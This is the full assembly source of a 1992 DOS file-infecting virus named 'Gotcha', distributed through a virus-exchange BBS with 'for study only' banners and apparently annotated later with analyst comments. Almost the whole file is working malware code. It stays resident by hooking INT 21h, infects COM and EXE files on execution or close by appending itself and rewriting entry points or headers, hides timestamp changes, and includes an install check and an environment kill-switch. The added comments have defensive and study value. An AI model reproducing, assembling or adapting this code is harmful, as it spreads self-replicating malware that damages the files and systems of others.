Assembly Source File  |  1992-10-11  |  19KB  |  504 lines

  1. ;****************************************************************************;
  2. ;                                                                            ;
  3. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  4. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  5. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  6. ;                     -=]                            [=-                     ;
  7. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  8. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  9. ;                     -=]                            [=-                     ;
  10. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  11. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  12. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  13. ;                                                                            ;
  14. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  15. ;                                                                            ;
  16. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  17. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  18. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  19. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  20. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  21. ; Is. Keep This Code in Responsible Hands!                                   ;
  22. ;                                                                            ;
  23. ;****************************************************************************;
  24. ;****************************************************************************
  25. ;*  Gotcha    version 17
  26. ;*
  27. ;*  Compile with MASM 4.0
  28. ;*  (other assemblers will probably not produce the same result)
  29. ;*
  30. ;*  Disclaimer:
  31. ;*  This file is only for educational purposes. The author takes no
  32. ;*  responsibility for anything anyone does with this file. Do not
  33. ;*  modify this file!
  34. ;****************************************************************************
  35.  
  36.                 .RADIX  16                      ;from here on, unsuffixed numbers are hexadecimal ('d' suffix = decimal)
  37.  
  38. cseg            segment
  39.                 assume  cs:cseg,ds:cseg,es:nothing
  40.  
  41.  
  42. VERSION         equ     17d                     ;decimal 17 (11h); low byte of the install-check reply
  43. FILELEN         equ     end - start             ;bytes between 'start' and 'end' = size of the copied image
  44. RESPAR          equ     (FILELEN/16d) + 18d     ;paragraphs subtracted from the host's memory block at install
  45. BUFLEN          equ     18                      ;18h (24 decimal) bytes of host file-begin kept in 'buffer'
  46. ENVLEN          equ     signature- envstring    ;length of 'envstring' including its terminating 0
  47. COMSIGN         equ     0                       ;values of the 'comexe' host-type flag
  48. EXESIGN         equ     1
  49.  
  50.  
  51. ;****************************************************************************
  52. ;*              Dummy program (infected)
  53. ;****************************************************************************
      ;  Stand-in host laid out like a modified COM file: a 3-byte near JMP at 0100
      ;  whose target is the install code that follows 'buffer' and 'comexe'.
  54.  
  55.                 org     0100
  56.  
  57. begin:          db      0E9, BUFLEN+1, 0        ;JMP near, displacement 0019h -> start+BUFLEN+1
  58.  
  59.  
  60. ;****************************************************************************
  61. ;*              Data
  62. ;****************************************************************************
      ;  'buffer' holds the host's first BUFLEN bytes as they were before the file
      ;  was changed; 'comexe' (at start+BUFLEN) records COM or EXE host.
      ;  Everything from 'start' is assembled at 0103 but runs at 0100 once resident,
      ;  which is why resident offsets elsewhere in the file are written as label-3.
  63.  
  64.                 org     0103
  65.  
  66. start:
  67. buffer          db      0CDh, 20                ;original code (INT 20h: the dummy host just terminates)
  68.                 db      (BUFLEN-2) dup (?)
  69. comexe          db      COMSIGN                 ;dummy program is a COM program
  70.  
  71.  
  72. ;****************************************************************************
  73. ;*              Install the virus
  74. ;****************************************************************************
      ;  Entry point reached from the patched host. What the code below does:
      ;   1. finds its own run-time address (call/pop) and pushes the host's
      ;      original CS:IP, so the final RETF hands control back to the host;
      ;   2. issues INT 21h AX=DADAh; if AH comes back as A5h a copy is already
      ;      resident and nothing else is done;
      ;   3. requires DOS 3.10 or later;
      ;   4. only if the memory block owning the program is the last one (type
      ;      byte 5Ah), shrinks it by RESPAR paragraphs, copies FILELEN bytes into
      ;      the freed area, saves the INT 21h vector behind the copy and points
      ;      INT 21h at the copy's handler.
      ;  Traces an analyst can look for: the AX=DADAh reply, an INT 21h vector that
      ;  points into the end of the program's former memory block, and a last
      ;  memory block that is RESPAR paragraphs smaller than expected.
  75.  
  76.                 call    start2
  77. start2:         pop     si                      ;si = run-time offset of start2
  78.                 sub     si,(BUFLEN+4)           ;si = begin virus
  79.                 mov     di,0100
  80.                 cld
  81.  
  82.                 cmp     byte ptr cs:[si+BUFLEN],COMSIGN ;host-type flag ('comexe')
  83.                 jz      entryC
  84.  
  85. entryE:         mov     ax,ds                   ;calculate CS
  86.                 add     ax,10                   ;DS + 10h paragraphs
  87.                 add     ax,cs:[si+16]           ;plus word saved at buffer+16h
  88.                 push    ax                      ;push new CS on stack
  89.                 push    cs:[si+14]              ;push new IP on stack
  90.                 jmp     short entcheck
  91.  
  92. entryC:         push    cs                      ;push new CS on stack
  93.                 push    di                      ;push new IP on stack
  94.                 push    di                      ;keep di/si across the 3-byte copy
  95.                 push    si
  96.                 movsw                           ;restore old file-begin
  97.                 movsb                           ;(3 bytes from buffer to es:0100)
  98.                 pop     si
  99.                 pop     di
  100.  
  101. entcheck:       mov     ax,0DADA                ;already installed?
  102.                 int     21
  103.                 cmp     ah,0A5                  ;reply produced by do_DADA
  104.                 je      entstop
  105.  
  106.                 mov     ax,3000                 ;test DOS version >= 3.1?
  107.                 int     21
  108.                 xchg    ah,al                   ;ax = major:minor
  109.                 cmp     ax,030A
  110.                 jb      entstop
  111.  
  112.                 push    ds
  113.                 push    es
  114.  
  115.                 mov     ax,ds                   ;adjust memory-size
  116.                 dec     ax                      ;paragraph just below DS
  117.                 mov     ds,ax
  118.                 cmp     byte ptr ds:[0000],5A   ;proceed only if the type byte is 5Ah
  119.                 jnz     cancel
  120.                 mov     ax,ds:[0003]            ;current size word
  121.                 sub     ax,low RESPAR
  122.                 jb      cancel                  ;block too small
  123.                 mov     ds:[0003],ax
  124.                 sub     word ptr ds:[0012],low RESPAR ;same reduction at offset 12h (= offset 2 of the next paragraph)
  125.  
  126.                 mov     es,ds:[0012]            ;copy program to top
  127.                 push    cs
  128.                 pop     ds
  129.                 mov     cx,FILELEN
  130.         rep     movsb                           ;ds:si (this copy) -> es:0100
  131.  
  132.                 mov     ds,cx                   ;get original int21 vector (cx = 0 after rep)
  133.                 mov     si,4*21
  134.                 movsw                           ;move it to the end
  135.                 movsw                           ;(es:di now sits right after the copied image)
  136.  
  137.                 push    es                      ;set vector to new handler
  138.                 pop     ds
  139.                 mov     dx,offset ni21-3        ;-3: image runs at 0100, assembled at 0103
  140.                 mov     ax,2521
  141.                 int     21
  142.  
  143. cancel:         pop     es
  144.                 pop     ds
  145.  
  146. entstop:        db      0CBh                    ;retf (to the CS:IP pushed above = host entry)
  147.  
  148.  
  149. ;****************************************************************************
  150. ;*              Interrupt 24 handler
  151. ;****************************************************************************
       ;  Replacement critical-error handler that 'infect' installs for the duration
       ;  of its file work. It only returns AL=3; presumably this is meant to fail the
       ;  DOS call quietly instead of showing an error prompt (e.g. on a
       ;  write-protected disk) -- confirm against DOS INT 24h documentation.
  152.  
  153. ni24:           mov     al,3
  154.                 iret
  155.  
  156.  
  157. ;****************************************************************************
  158. ;*              Interrupt 21 handler
  159. ;****************************************************************************
       ;  Resident INT 21h hook. Three cases are handled, everything else is passed on:
       ;    AX=DADAh  install check: returns AX = A500h+VERSION and does not chain;
       ;    AH=3Eh    close: duplicates the handle (AH=45h) and gives the duplicate
       ;              to 'infect';
       ;    AX=4B00h  execute: opens the named file (AH=3Dh, AL still 00) and gives
       ;              the new handle to 'infect'.
       ;  After that all registers and flags are restored and the call continues in
       ;  the original handler through the vector saved behind the image (oi21-3).
       ;  For monitoring: file opens or handle duplications that appear on every
       ;  program start and every close are the visible side effect of this hook.
  160.  
  161. ni21:           pushf
  162.  
  163.                 cmp     ax,0DADA                ;install-check ?
  164.                 je      do_DADA
  165.  
  166.                 push    dx
  167.                 push    cx
  168.                 push    bx
  169.                 push    ax
  170.                 push    si
  171.                 push    di
  172.                 push    ds
  173.                 push    es
  174.  
  175.                 cmp     ah,3E                   ;close ?
  176.                 jne     vvv
  177.                 mov     ah,45                   ;duplicate handle
  178.                 jmp     short doit
  179.  
  180. vvv:            cmp     ax,4B00                 ;execute ?
  181.                 jne     exit
  182.                 mov     ah,3Dh                  ;open the file
  183.  
  184. doit:           int     21                      ;nested call; goes through this hook again
  185.                 jc      exit                    ;open/dup failed: just chain
  186.                 xchg    ax,bx                   ;bx = handle for infect
  187.                 call    infect
  188.  
  189. exit:           pop     es
  190.                 pop     ds
  191.                 pop     di
  192.                 pop     si
  193.                 pop     ax
  194.                 pop     bx
  195.                 pop     cx
  196.                 pop     dx
  197.                 popf
  198.  
  199. org21:          jmp     dword ptr cs:[oi21-3]   ;call to old int-handler
  200.  
  201.  
  202. do_DADA:        mov     ax,0A500+VERSION        ;return a signature
  203.                 popf
  204.                 iret
  205.  
  206.  
  207. ;****************************************************************************
  208. ;*              Close the file
  209. ;****************************************************************************
       ;  Closes handle BX through the original INT 21h handler, bypassing the hook.
       ;  PUSHF + PUSH CS + near CALL build the same stack frame an INT would, so the
       ;  old handler's IRET comes back to the RET below.
  210.  
  211. close:          mov     ah,3E                   ;close the file
  212.                 pushf
  213.                 push    cs
  214.                 call    org21
  215.                 ret
  216.  
  217.  
  218. ;****************************************************************************
  219. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  220. ;****************************************************************************
       ;  As called from ni21, the routine works on the open handle in BX; name,
       ;  size, position and mode are read from and written to the file-table entry
       ;  that INT 2Fh AX=1220h/1216h returns in ES:DI, not through DS:DX.
       ;
       ;  Conditions under which the file is left unchanged:
       ;    - the current process environment contains the entry at 'envstring'
       ;      (compared over ENVLEN bytes, i.e. including the terminating 0);
       ;    - the extension is neither COM nor EXE;
       ;    - the name starts with 'V' or 'F', or contains 'SC' (presumably to stay
       ;      away from anti-virus tools of the time -- not stated in the source);
       ;    - the 3 bytes read from (size-3) start with 'A','!' (tail of 'signature');
       ;    - COM only: the byte at entry+12h (size bits 8-15) is <= 03h or >= 0FCh;
       ;    - the write of the image returns fewer than FILELEN bytes.
       ;
       ;  Traces on a changed file: FILELEN bytes appended, ending in 'GOTCHA!',0;
       ;  the first BUFLEN bytes rewritten (COM: 0E9h + 16-bit displacement,
       ;  EXE: header words at +2, +4, +14h, +16h); date/time not updated on close.
       ;  While it runs, the ctrl-break flag is cleared and INT 24h is redirected;
       ;  both are put back before returning.
  221.  
  222. infect:         cld
  223.  
  224.                 push    bx
  225.                 mov     ah,62                   ;get segment-address of PSP
  226.                 int     21
  227.                 mov     ds,bx                   ;get seg-address of environment
  228.                 mov     es,ds:[002C]
  229.                 xor     di,di
  230.                 pop     bx
  231.                 push    cs
  232.                 pop     ds
  233.                 
  234. envloop:        mov     si,offset envstring-3   ;check the environment
  235.                 mov     cx,ENVLEN
  236.         repz    cmpsb
  237.                 jz      close                   ;exit if item found (close's RET returns to our caller)
  238.                 dec     di                      ;goto next item
  239.                 xor     al,al
  240.                 mov     ch,0FF
  241.         repnz   scasb                           ;skip to the byte after this entry's 0
  242.                 cmp     byte ptr es:[di],0      ;finished environment?
  243.                 jnz     envloop
  244.  
  245.                 mov     ax,3300                 ;get ctrl-break flag
  246.                 int     21
  247.                 push    dx                      ;saved for the restore at the end
  248.  
  249.                 cwd                             ;clear the flag (dx = 0)
  250.                 inc     ax                      ;ax = 3301: set ctrl-break flag
  251.                 push    ax                      ;reused for the restore at the end
  252.                 int     21
  253.  
  254.                 mov     dx,bx                   ;park the handle; int 21/35 returns in bx
  255.                 mov     ax,3524                 ;get int24 vector
  256.                 int     21
  257.                 push    bx                      ;old vector offset
  258.                 push    es                      ;old vector segment
  259.                 mov     bx,dx
  260.  
  261.                 push    cs
  262.                 pop     ds
  263.  
  264.                 mov     dx,offset ni24          ;set int24 vector
  265.                 mov     ah,25                   ;al is still 24
  266.                 push    ax                      ;ax = 2524, reused for the restore
  267.                 int     21
  268.  
  269.                 mov     ax,1220                 ;get file-table entry
  270.                 push    bx
  271.                 push    ax
  272.                 int     2F
  273.                 mov     bl,es:[di]              ;table index for this handle
  274.                 pop     ax
  275.                 sub     al,0A                   ;ax = 1216
  276.                 int     2F                      ;es:di = file-table entry
  277.                 pop     bx
  278.  
  279.                 push    es
  280.                 pop     ds
  281.  
  282.                 push    [di+2]                  ;save attribute & open-mode
  283.                 push    [di+4]
  284.  
  285.                 cmp     word ptr [di+28],'XE'   ;check extension
  286.                 jne     not_exe
  287.                 cmp     byte ptr [di+2A],'E'
  288.                 jmp     short check
  289.  
  290. not_exe:        cmp     word ptr [di+28],'OC'
  291.                 jne     close1v
  292.                 cmp     byte ptr [di+2A],'M'
  293. check:          je      check_name
  294. close1v:        jmp     close1
  295.  
  296. check_name:     cmp     byte ptr [di+20],'V'    ;name is V*.* ?
  297.                 je      close1v
  298.                 cmp     byte ptr [di+20],'F'    ;name is F*.* ?
  299.                 je      close1v
  300.  
  301.                 mov     cx,7                    ;name is *SC*.* ?
  302.                 mov     ax,'CS'
  303.                 push    di
  304.                 add     di,21
  305. SCloop:         dec     di                      ;dec + scasw = advance one byte per pass
  306.                 scasw
  307.                 loopnz  SCloop                  ;up to 7 overlapping byte pairs
  308.                 pop     di
  309.                 je      close1v
  310.  
  311.                 mov     byte ptr [di+2],2       ;open for read/write
  312.                 mov     byte ptr [di+4],0       ;clear attributes
  313.                 call    getlen
  314.                 mov     cl,3
  315.                 sub     ax,cx                   ;goto signature
  316.                 sbb     dx,0
  317.                 call    goto
  318.                 push    ax                      ;save old offset
  319.                 push    dx
  320.  
  321.                 push    cs
  322.                 pop     ds
  323.  
  324.                 mov     si,0100                 ;read signature
  325.                 mov     dx,si                   ;into cs:0100 (resident 'buffer')
  326.                 mov     ah,3F
  327.                 int     21
  328.  
  329.                 cmp     word ptr [si],'!A'      ;already infected?
  330.                 je      close2v
  331.  
  332.                 call    gotobegin
  333.  
  334.                 mov     cl,BUFLEN               ;read begin
  335.                 mov     dx,si
  336.                 mov     ah,3F
  337.                 int     21
  338.  
  339.                 cmp     word ptr [si],5A4Dh     ;EXE ?
  340.                 jz      do_EXE
  341.                 cmp     word ptr [si],4D5A      ;same two bytes in the other order
  342.                 jz      do_EXE
  343.  
  344. do_COM:         mov     byte ptr [si+BUFLEN],COMSIGN
  345.  
  346.                 cmp     byte ptr es:[di+12],0FC ;check length
  347.                 jnb     close2
  348.                 cmp     byte ptr es:[di+12],3
  349.                 jbe     close2
  350.  
  351.                 call    writeprog               ;write program to end of file
  352.                 jnz     close2
  353.  
  354.                 mov     byte ptr [si],0E9h      ;JMP xxxx'
  355.                 call    getoldlen
  356.                 add     ax,(BUFLEN-2)           ;displacement = old length + BUFLEN-2
  357.                 mov     word ptr [si+1],ax
  358.  
  359.                 jmp     short done
  360. close2v:        jmp     short close2
  361.  
  362. do_EXE:         mov     byte ptr [si+BUFLEN],EXESIGN
  363.  
  364.                 call    writeprog               ;write program to end of file
  365.                 jnz     close2
  366.  
  367.                 call    getlen                  ;calculate new length 
  368.                 mov     cx,0200                 ;put new length in header
  369.                 div     cx                      ;ax = size / 200h, dx = size mod 200h
  370.                 inc     ax
  371.                 mov     word ptr [si+4],ax
  372.                 mov     word ptr [si+2],dx
  373.  
  374.                 call    getoldlen               ;calculate new CS & IP
  375.                 mov     cx,0010
  376.                 div     cx                      ;ax = paragraphs, dx = remainder
  377.                 sub     ax,word ptr [si+8]      ;minus header word at +8
  378.                 mov     word ptr [si+16],ax     ;put CS in header
  379.                 add     dx,BUFLEN+1
  380.                 mov     word ptr [si+14],dx     ;put IP in header
  381.  
  382.  
  383. done:           call    gotobegin
  384.                 mov     cx,BUFLEN               ;write new begin
  385.                 mov     dx,si
  386.                 mov     ah,40
  387.                 int     21
  388.  
  389. close2:         push    es
  390.                 pop     ds
  391.  
  392.                 pop     dx                      ;restore old offset in file
  393.                 pop     ax
  394.                 call    goto
  395.  
  396.                 or      byte ptr [di+6],40      ;no time-change
  397.  
  398. close1:         call    close
  399.  
  400.                 or      byte ptr [di+5],40      ;no EOF on next close
  401.                 pop     [di+4]                  ;restore attribute & open-mode
  402.                 pop     [di+2]
  403.  
  404.                 pop     ax                      ;restore int24 vector
  405.                 pop     ds
  406.                 pop     dx
  407.                 int     21
  408.  
  409.                 pop     ax                      ;restore ctrl-break flag
  410.                 pop     dx
  411.                 int     21
  412.  
  413.                 ret
  414.  
  415.  
  416. ;****************************************************************************
  417. ;*              Get original length of program
  418. ;****************************************************************************
       ;  In:  es:di = file-table entry.  Out: dx:ax = current size minus FILELEN.
       ;  Only meaningful after writeprog has appended the image.
  419.  
  420. getoldlen:      call    getlen
  421.                 sub     ax,FILELEN
  422.                 sbb     dx,0
  423.                 ret
  424.  
  425.  
  426. ;****************************************************************************
  427. ;*              Get length of program
  428. ;****************************************************************************
       ;  In:  es:di = file-table entry.  Out: dx:ax = the dword at entry+11h,
       ;  which the callers treat as the file size.
  429.  
  430. getlen:         mov     ax,es:[di+11]
  431.                 mov     dx,es:[di+13]
  432.                 ret
  433.  
  434.  
  435. ;****************************************************************************
  436. ;*              Goto new offset DX:AX
  437. ;****************************************************************************
       ;  'goto' swaps dx:ax with the dword at entry+15h (es:di = file-table entry):
       ;  the file position is set directly in the table, and the previous position
       ;  comes back in dx:ax. 'gotobegin' zeroes dx:ax first and falls through.
  438.  
  439. gotobegin:      xor     ax,ax
  440.                 cwd                             ;dx = 0 as well
  441. goto:           xchg    ax,es:[di+15]
  442.                 xchg    dx,es:[di+17]
  443.                 ret
  444.  
  445.  
  446. ;****************************************************************************
  447. ;*              Write virus to the file
  448. ;****************************************************************************
       ;  In:  bx = handle, ds:si = start of the resident image, es:di = file-table entry.
       ;  Moves the file position to the current size (end of file) and writes
       ;  FILELEN bytes from ds:si. Out: ZF set only if all FILELEN bytes were written;
       ;  callers abandon the file on NZ.
  449.  
  450. writeprog:      call    getlen
  451.                 call    goto
  452.  
  453.                 mov     cx,FILELEN              ;write virus
  454.                 mov     dx,si
  455.                 mov     ah,40
  456.                 int     21
  457.                 cmp     cx,ax                   ;are all bytes written?
  458.                 ret
  459.  
  460.  
  461. ;****************************************************************************
  462. ;*              Text and Signature
  463. ;****************************************************************************
       ;  'envstring' is the environment entry that makes 'infect' skip its work.
       ;  'signature' is the last data in the image, so it ends every modified file;
       ;  'infect' tests the final 3 bytes ('A','!',0) to recognise such a file.
       ;  'oi21'/'end' mark the first byte past the image: at install time the
       ;  original INT 21h vector is stored there (inside the RESPAR reservation,
       ;  outside the FILELEN bytes written to files).
  464.  
  465. envstring       db      'E=mc²',0
  466.  
  467. signature:      db      'GOTCHA!',0             ;I have got you!  :-)
  468.  
  469. oi21:
  470. end:
  471.  
  472. cseg            ends
  473.                 end     begin
  474.  
  475. ;****************************************************************************;
  476. ;                                                                            ;
  477. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  478. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  479. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  480. ;                     -=]                            [=-                     ;
  481. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  482. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  483. ;                     -=]                            [=-                     ;
  484. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  485. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  486. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  487. ;                                                                            ;
  488. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  489. ;                                                                            ;
  490. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  491. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  492. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  493. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  494. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  495. ; Is. Keep This Code in Responsible Hands!                                   ;
  496. ;                                                                            ;
  497. ;****************************************************************************;
  498.  
  499. ;─────────────────────────────────────────────────────────────────────────;
  500. ;──────────────────> and Remember Don't Forget to Call <──────────────────;
  501. ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
  502. ;─────────────────────────────────────────────────────────────────────────;
  503.  
  504.